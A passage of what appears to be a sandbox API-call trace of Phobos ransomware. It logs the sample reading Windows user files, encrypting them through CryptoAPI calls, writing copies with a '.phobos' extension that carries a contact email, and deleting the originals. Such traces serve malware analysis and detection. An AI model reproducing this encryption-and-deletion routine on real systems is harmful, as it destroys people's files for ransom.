nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x13e, lpOverlapped=0x0) returned 1 [0203.064] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x140, dwBufLen=0x140 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x140) returned 1 [0203.064] WriteFile (in: hFile=0x13c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x140, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x140, lpOverlapped=0x0) returned 1 [0203.065] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32868) returned 1 [0203.065] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0203.065] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0203.065] CryptDestroyKey (hKey=0xa32868) returned 1 [0203.065] WriteFile (in: hFile=0x13c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0203.065] CryptDestroyKey (hKey=0xa32928) returned 1 [0203.065] CloseHandle (hObject=0x100) returned 1 [0203.065] CloseHandle (hObject=0x13c) returned 1 [0203.065] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\maintenance\\desktop.ini")) returned 1 [0203.066] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0203.066] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0203.067] GetFileSizeEx (in: hFile=0x13c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=174) returned 1 [0203.067] CloseHandle (hObject=0x13c) returned 1 [0203.067] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\desktop.ini")) returned 0x26 [0203.067] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0203.067] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0203.067] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0203.067] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0203.067] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0203.067] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32928) returned 1 [0203.067] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0203.067] ReadFile (in: hFile=0x13c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xae, lpOverlapped=0x0) returned 1 [0203.068] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb0, dwBufLen=0xb0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb0) returned 1 [0203.068] WriteFile (in: hFile=0x100, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xb0, lpOverlapped=0x0) returned 1 [0203.070] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32868) returned 1 [0203.070] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0203.070] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0203.070] CryptDestroyKey (hKey=0xa32868) returned 1 [0203.070] WriteFile (in: hFile=0x100, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0203.070] CryptDestroyKey (hKey=0xa32928) returned 1 [0203.070] CloseHandle (hObject=0x13c) returned 1 [0203.070] CloseHandle (hObject=0x100) returned 1 [0203.070] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\desktop.ini")) returned 1 [0203.071] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0203.071] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\themes\\transcodedwallpaper.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0203.071] GetFileSizeEx (in: hFile=0x100, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=637252) returned 1 [0203.071] CloseHandle (hObject=0x100) returned 1 [0203.071] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\themes\\transcodedwallpaper.jpg")) returned 0x2020 [0203.072] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\themes\\transcodedwallpaper.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0203.072] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\themes\\transcodedwallpaper.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0203.072] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0203.072] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0203.072] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\themes\\transcodedwallpaper.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0203.072] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32928) returned 1 [0203.072] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0203.072] ReadFile (in: hFile=0x100, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x9b944, lpOverlapped=0x0) returned 1 [0203.140] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x9b950, dwBufLen=0x9b950 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x9b950) returned 1 [0203.145] WriteFile (in: hFile=0x13c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x9b950, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x9b950, lpOverlapped=0x0) returned 1 [0203.155] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32868) returned 1 [0203.156] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0203.156] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0203.156] CryptDestroyKey (hKey=0xa32868) returned 1 [0203.156] WriteFile (in: hFile=0x13c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0203.156] CryptDestroyKey (hKey=0xa32928) returned 1 [0203.156] CloseHandle (hObject=0x100) returned 1 [0203.156] CloseHandle (hObject=0x13c) returned 1 [0203.156] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\themes\\transcodedwallpaper.jpg")) returned 1 [0203.161] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0203.161] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG" (normalized: "c:\\users\\default\\ntuser.dat.log"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0203.162] GetFileSizeEx (in: hFile=0x13c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=1024) returned 1 [0203.162] CloseHandle (hObject=0x13c) returned 1 [0203.162] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG" (normalized: "c:\\users\\default\\ntuser.dat.log")) returned 0x22 [0203.162] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\ntuser.dat.log.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0203.162] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG" (normalized: "c:\\users\\default\\ntuser.dat.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0203.162] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0203.162] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0203.162] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\ntuser.dat.log.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0203.163] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32928) returned 1 [0203.163] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0203.163] ReadFile (in: hFile=0x13c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x400, lpOverlapped=0x0) returned 1 [0204.389] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x410, dwBufLen=0x410 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x410) returned 1 [0204.389] WriteFile (in: hFile=0x100, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x410, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x410, lpOverlapped=0x0) returned 1 [0204.390] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32a28) returned 1 [0204.390] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0204.390] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0204.390] CryptDestroyKey (hKey=0xa32a28) returned 1 [0204.390] WriteFile (in: hFile=0x100, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0204.390] CryptDestroyKey (hKey=0xa32928) returned 1 [0204.390] CloseHandle (hObject=0x13c) returned 1 [0204.390] CloseHandle (hObject=0x100) returned 1 [0204.390] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG" (normalized: "c:\\users\\default\\ntuser.dat.log")) returned 1 [0204.392] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0204.392] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0204.393] GetFileSizeEx (in: hFile=0x100, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=4113874) returned 1 [0204.393] CloseHandle (hObject=0x100) returned 1 [0204.393] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3")) returned 0x20 [0204.394] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0204.395] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0204.395] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc40 | out: lpNewFilePointer=0x0) returned 1 [0204.395] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc40 | out: lpNewFilePointer=0x0) returned 1 [0204.395] ReadFile (in: hFile=0x100, lpBuffer=0x34b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2f4fc4c, lpOverlapped=0x0 | out: lpBuffer=0x34b0058*, lpNumberOfBytesRead=0x2f4fc4c*=0x40000, lpOverlapped=0x0) returned 1 [0204.600] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x14ec9b, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc40 | out: lpNewFilePointer=0x0) returned 1 [0204.601] ReadFile (in: hFile=0x100, lpBuffer=0x34f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2f4fc4c, lpOverlapped=0x0 | out: lpBuffer=0x34f0058*, lpNumberOfBytesRead=0x2f4fc4c*=0x40000, lpOverlapped=0x0) returned 1 [0204.658] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x3ac5d2, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc40 | out: lpNewFilePointer=0x0) returned 1 [0204.658] ReadFile (in: hFile=0x100, lpBuffer=0x3530058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2f4fc4c, lpOverlapped=0x0 | out: lpBuffer=0x3530058*, lpNumberOfBytesRead=0x2f4fc4c*=0x40000, lpOverlapped=0x0) returned 1 [0204.719] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc30, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc9c | out: phKey=0x2f4fc9c*=0xa32928) returned 1 [0204.719] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0204.720] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc50*=0xc0080, dwBufLen=0xc0080 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc50*=0xc0080) returned 1 [0204.725] CryptDestroyKey (hKey=0xa32928) returned 1 [0204.725] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc78 | out: lpNewFilePointer=0x0) returned 1 [0204.725] WriteFile (in: hFile=0x100, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xc0132, lpNumberOfBytesWritten=0x2f4fc88, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc88*=0xc0132, lpOverlapped=0x0) returned 1 [0204.745] SetEndOfFile (hFile=0x100) returned 1 [0204.765] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x3ac5d2, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc48 | out: lpNewFilePointer=0x0) returned 1 [0204.765] WriteFile (in: hFile=0x100, lpBuffer=0x357016a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2f4fc54, lpOverlapped=0x0 | out: lpBuffer=0x357016a*, lpNumberOfBytesWritten=0x2f4fc54*=0x40000, lpOverlapped=0x0) returned 1 [0204.767] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x14ec9b, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc48 | out: lpNewFilePointer=0x0) returned 1 [0204.768] WriteFile (in: hFile=0x100, lpBuffer=0x357016a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2f4fc54, lpOverlapped=0x0 | out: lpBuffer=0x357016a*, lpNumberOfBytesWritten=0x2f4fc54*=0x40000, lpOverlapped=0x0) returned 1 [0204.769] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc48 | out: lpNewFilePointer=0x0) returned 1 [0204.769] WriteFile (in: hFile=0x100, lpBuffer=0x357016a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2f4fc54, lpOverlapped=0x0 | out: lpBuffer=0x357016a*, lpNumberOfBytesWritten=0x2f4fc54*=0x40000, lpOverlapped=0x0) returned 1 [0204.770] CloseHandle (hObject=0x100) returned 1 [0204.771] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0204.771] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0204.771] GetFileSizeEx (in: hFile=0x100, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=380) returned 1 [0204.771] CloseHandle (hObject=0x100) returned 1 [0204.771] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\desktop.ini")) returned 0x26 [0204.771] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\pictures\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0204.772] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0204.772] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0204.772] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0204.772] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\pictures\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0204.880] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32928) returned 1 [0204.880] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0204.880] ReadFile (in: hFile=0x100, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x17c, lpOverlapped=0x0) returned 1 [0204.881] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x180, dwBufLen=0x180 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x180) returned 1 [0204.881] WriteFile (in: hFile=0x13c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x180, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x180, lpOverlapped=0x0) returned 1 [0204.882] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32a28) returned 1 [0204.882] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0204.882] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0204.882] CryptDestroyKey (hKey=0xa32a28) returned 1 [0204.882] WriteFile (in: hFile=0x13c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0204.882] CryptDestroyKey (hKey=0xa32928) returned 1 [0204.882] CloseHandle (hObject=0x100) returned 1 [0204.882] CloseHandle (hObject=0x13c) returned 1 [0204.882] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\desktop.ini" (normalized: 